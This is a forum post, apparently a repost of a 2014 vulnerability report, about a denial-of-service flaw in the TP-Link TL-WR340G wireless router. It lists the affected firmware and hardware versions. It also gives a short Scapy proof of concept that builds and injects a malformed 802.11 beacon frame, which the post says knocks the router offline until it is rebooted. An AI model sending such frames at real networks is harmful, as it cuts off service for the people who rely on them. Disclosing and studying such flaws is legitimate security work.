ROS软路由论坛 ROSABC.com 网络方案网络工程交流

 找回密码
 会员注册

QQ登录

只需一步,快速开始

TL-WR340G无线路由器拒绝服务漏洞和触发过程

2014-7-8 21:29| 发布者: admin| 查看: 521| 评论: 0

摘要: 再安全可靠的软硬件都难免会出现漏洞和BUG,下面以TL-WR340G为例子来说明问题,并提供一些解决的思路。要想修正漏洞,通常都要等待官方发布新的固件。 TL-WR340G是TP-Link出品的一款轻量级无线路由器,近日有国外黑 ...

再安全可靠的软硬件都难免会出现漏洞和BUG,下面以TL-WR340G为例子来说明问题,并提供一些解决的思路。要想修正漏洞,通常都要等待官方发布新的固件。
TL-WR340G是TP-Link出品的一款轻量级无线路由器,近日有国外黑客发现了这款路由器上的一个拒绝服务漏洞,只要发送一个简单的畸形包到路由器,便可使路由器停止工作,需要手动重启路由器才能恢复正常,算是比较严重的了。
漏洞细节:
型号:TL-WR340G无线路由器
固件版本:4.7.11  Build 101102 Rel.60376n
硬件版本:WR340G v3
触发漏洞的过程非常简单,需要用到网络软件Scapy,构造包的详情如下:
1     fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP
2     MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
接下来发送数据包:
1     sendp(fr,iface="injection capable wireless interface",count=5)
攻击成功之后,路由器将直接挂掉,具体表现就是不管已经连接还是未连接的客户端都无法连接互联网,除非手动登入管理界面软重启或者断电重启。


 

不良信息举报Q:2000617

软路由

不良信息举报Q:2000617|Archiver|ROS软路由论坛 ROSABC.com 网络方案网络工程交流

GMT+8, 2025-10-23 22:52 , Processed in 0.028602 second(s), 15 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

返回顶部